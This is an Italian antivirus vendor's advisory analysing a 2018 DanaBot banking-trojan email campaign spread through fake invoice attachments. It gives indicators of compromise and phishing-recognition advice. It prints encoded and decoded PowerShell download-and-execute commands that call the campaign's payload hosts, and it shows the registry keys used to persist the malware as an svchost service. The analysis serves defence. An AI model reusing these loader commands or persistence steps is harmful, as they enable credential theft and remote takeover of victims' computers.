Attenzione! Riprende campagna malspam DanaBot che esfiltra login e password e permette ai malfattori anche il contollo del pc da remoto...

Analisi da parte del C.R.A.M. (Centro di Ricerca Anti-Malware) di TG Soft di una delle mail che diffonde il malware Trojan Banker DanaBot in data 13 Novembre 2018

Per gli invii massivi di mail fraudolente, vengono utilizzati i metodi di "ingegneria sociale" che sono sviluppati da persone/cyber-criminali per indurre la vittima ad aprire gli allegati infetti oppure a cliccare sui link presenti nel corpo del messaggio

INDICE

==> Falsa Mail diffonde Trojan "DanaBot"

==> Come cercare di riconoscere una falsa mail

==> Come inviare mail sospette

==> Integra la protezione con Vir.IT Lite

==> Per i liceziatari in assistenza della versione PRO di Vir.IT eXplorer..

Se hai ricevuto un email sospetta, inviala al C.R.A.M. (Centro di Ricerca Anti-Malware): Come inviare mail sospette

Falsa Mail diffonde Trojan "DanaBot"

Nome:DanaBot
Famiglia malware: Banker
VirIT: Trojan.Win32.DanaBot

Descrizione:
La mail è stata rilevata in data 13 Novembre 2018

Esempio di email analizzata:

Oggetto: fattura n11395_18_11

 immagine_1

ingrandire immagine

Torna ad inizio pagina

Come si diffonde:
Il malware si diffonde via e-mail ingannevole in cui ci viene notificata una fattura Nxxxxxx contenente l'allegato Fattura[numero_casuale].rar.
Scompattando l'archivio rar all'interno troviamo il file fattura[numero_casuale].vbs, che una volta eseguito darà il via al meccanismo d'infezione.

Il file fattura[numero_casuale].vbs nel momento in cui viene eseguito agli occhi del malcapitato utente sembrerà non avvenire nulla, in realtà il file è in esecuzione e resta in attesa per 15 minuti prima di effettuare il download del payload tramite il seguente comando powershell codificato :

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAu
AFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AH
IAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAGwAZQBwAGgAYQBuAHQA
YwBlAGwAbAAuAHMAdABvAHIAZQA6ADQANAAzAC8AYwBoAGsAZQBzAG8Acw
BvAGQALwBkAG8AdwBuAHMALwB0AFMAeABXACcAKQA7AA==

Dove il suo valore decodificato e' il seguente:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
IEX (New-Object Net.WebClient).DownloadString
('https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW');

Ed esegue la connessione al sito:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
da cui effettua il download della dll KpcLIimT.dll

La dll KpcLIimT.dll appena scaricata verrà salvata nella cartella %Temp% dell'utente.

Nome File: KpcLIimT.dll
Dimensione: 450.645 byte
Md5: 6E7460AD7C963480984C6ACDAFAAFEFD

Dopo il download della dll KpcLIimT.dll verrà creato il processo:

C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"

Utilizzando la chiave di registro :

[HKCU\Software\Classes\mscfile\shell\open\command]
"C:\Windows\System32\rundll32.exe "%Temp%\KpcLIimT.dll,f1"

Il file fattura[numero_casuale].vbs lancia un ulteriore comando powershell cifrato come segue:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuA
CcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAMQA5ADIALgAzAC4AMwAxAC4AMg
AxADEAJwA7ACAASQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGU
AYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBo
AHQAdABwADoALwAvACcAIAArACAAJABoAG8AcwB0AG4AYQBtAGUAIAArACAAJABwAGEAd
ABoACkAOwA=

con il seguente valore decifrato

$path = '/fax.php?id=admin';
$hostname =192.3.31.211';IEX(NewObjectNet.Webclient).downloadstring('http://' + $hostname + $path);

connettendosi all'indirizzo :
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin
e riscaricando il file KpcLIimT.dll.

Il quale a sua volta effettuerà il download della dll C44AF232.dll in
C:\PROGRA~2\C44AF257.

Nome File: C44AF232.dll
Dimensione: 1702.928 byte
Md5: 5E5059614600B07F8D4C1DFD38FE345E

Dopo il download tale dll viene posta in esecuzione automatica come servizio del sistema, sfruttando il processo svchost.exe del sistema operativo, in modo da non essere facilmente individuabile e garantire l'esecuzione del malware ad ogni utilizzo del pc , scrivendo le seguanti chiavi nel registro di sistema:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232]
"DisplayName"="@%SystemRoot%\\system32\\Sens.dll,-200"
"Group"="ProfSvc_Group"
"ObjectName"="LocalSystem"
"Description"="@%SystemRoot%\\system32\\Sens.dll,-201"
"Type"="dword:00000110"
"Start"="dword:00000002"
"ErrorControl"="dword:00000001"
"ImagePath"="C:\Windows\system32\svchost.exe -k LocalService"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\C44AF232\Parameters]

"ServicesDll"="C:\PROGRA~2\C44AF257\C44AF232.DLL"

Il Trojan.Win32.DanaBot fa parte della macrofamiglia dei Banker, le sue peculiarità sono :

carpire login e password di accesso a siti importanti come home banking, posta elettronica, ftp etc...

permettere all'attacante di controllare il pc da remoto.

IOC

MD5:
818CF570A341F7AC8723DD5E8103345D
6E7460AD7C963480984C6ACDAFAAFEFD
5E5059614600B07F8D4C1DFD38FE345E

URL:
https[:]//elephantcell[.]store[:]443/chkesosod/downs/tSxW
http[:]//192[.]3[.]31[.]211//fax[.]php?id=admin

Torna ad inizio pagina

Come cercare di riconoscere una falsa mail

L'esperienza ed il buon senso sono le prime armi per non rimanere vittima di questo tipo di truffe.
E' fondamentale un'attenta lettura della mail, in tutti i suoi elementi. Diffidare da subito di allegati in formato ZIP e, se possibile, NON abilitare l'esecuzione automatica delle macro. E' fortemente sconsigliato impostare l'esecuzione automatica delle macro poichè la semplice apertura di file Word ed Excel vedrà l'immediata esecuzione delle macro senza alcun alert preventivo.
Nel caso in cui si fosse stati infettati da un Banker, il consiglio da parte del C.R.A.M. di TG Soft è quello di prendere opportuni accorgimenti di sicurezza anche dopo la bonifica del/dei sistemi coinvolti come il cambio delle password più comunemente utilizzate nel web.
Nel caso in cui la postazione coinvolta fosse stata utilizzata per operazioni di home-banking è consigliato anche un accertamento con il proprio istituto di credito.

Come inviare e-mail sospette per l'analisi come possibili virus/malware/ransomware e/o tentativi di Phishing

L'invio di materiali da analizzare al Centro Ricerche Anti-Malware di TG Soft per l'analisi che è sempre e comunque gratuito può avvenire in tutta sicurezza in due modalità:

qualsiasi e-mail che sia da considerarsi sospetta può essere inviata direttamente dalla posta elettronica del ricevente scegliendo come modalità di invio "INOLTRA come ALLEGATO" e inserendo nell'oggetto "Possibile Phishing da verificare" piuttosto che "Possibile Malware da verificare" alla mail lite@virit.com
salvare come file esterno al programma di posta elettronica utilizzato la mail da inviare al C.R.A.M. di TG Soft per l'analisi . Il file che ne risulterà dovrà essere inviato facendone l'Upload dalla pagina di INVIO File Sospetti (http://www.tgsoft.it/italy/file_sospetti.asp). Naturalmente per avere un feed-back rispetto al responso dell'analisi dei file infetti inviati sarà necessario indicare un indirizzo e-mail e sarà gradita una breve descrizione del motivo dell'invio del file (ad esempio: possibile/probabile phishing; possibile/probabile malware o altro).

Tutto questo per aiutare ad aiutarvi cercando di evitare che possiate incappare in furti di credenziali, virus/malware o ancor peggio Ransomware / Crypto-Malware di nuova generazione.

Torna ad inizio pagina

Integra la protezione del tuo PC/SERVER con Vir.IT eXplorer Lite

Se non doveste ancora utilizzare Vir.IT eXplorer PRO è consigliabile installare, ad integrazione dell'antivirus in uso per aumentare la sicurezza dei vostri computer, PC e SERVER indifferentemente, Vir.IT eXplorer Lite -FREE Edition-.

Vir.IT eXplorer Lite ha le seguenti caratteristiche peculiari:

liberamente utilizzabile sia in ambito privato sia in ambito aziendale con aggiornamenti Motore+Firme senza limitazioni temporali;
interoperabile con eventuali altri AntiVirus, AntiSpyware, AntiMalware o Internet Security già presenti su PC e SERVER, consigliato l'utilizzo ad integrazione dell'AntiVirus già in uso poichè non conflitta nè rallenta il sistema ma permette di aumentare sensibilmente la sicurezza in termini di identificazione e bonifica dei file infetti;
identifica e, in moltissimi casi, anche rimuove la maggior parte dei virus/malware realmente circolanti o, in alternativa, ne permette l'invio al C.R.A.M. Centro Ricerche Anti-Malware di TG Soft per l'analisi e l'aggiornamento di Vir.IT eXplorer per l'univoca identificazione e la corretta rimozione;
grazie alla tecnologia Intrusione Detection, resa disponibile anche nella versione Lite di Vir.IT eXplorer, il software è in grado di segnalare eventuali virus/malware di nuova generazione che si siano posti in esecuzione automatica e procedere all'invio dei file segnalati al C.R.A.M. di TG Soft.
Procedi al download di Vir.IT eXplorer Lite dalla pagina ufficiale di distribuzione del sito di TG Soft.

Per i licenziatari in assistenza della versione PRO di Vir.IT eXplorer...

Per i possessori di Vir.IT eXplorer PRO è anche possibile contattare gratuitamente il supporto tecnico telefonico di TG Soft le cui modalità sono consultabili alla pagina del supporto CLIENTI.

C.R.A.M.
Centro Ricerche Anti-Malware di TG Soft

Torna ad inizio pagina

Ogni informazioni pubblicata sul nostro sito può essere utilizzata e pubblicata su altri siti internet, blog, forum, facebook e/o in ogni altra forma sia in modalità cartacea che elettronica a patto che venga sempre e comunque citata la fonte esplicitamente “Fonte: C.R.A.M. by TG Soft www.tgsoft.it” con link cliccabile all'informativa e/o pagina web originale da cui sono stati estrapolati contenuti testuali, spunti e/o immagini.

Sarà gradito nel caso di utilizzo dell'informativa del C.R.A.M. by TG Soft www.tgsoft.it nella relazione di articoli di sintesi il riconoscimento/ringraziamento di seguito “Si ringrazia il Centro Ricerche Anti-Malware C.R.A.M. by TG Soft di cui segnaliamo il link diretto all'informativa originale:[link diretto cliccabile]”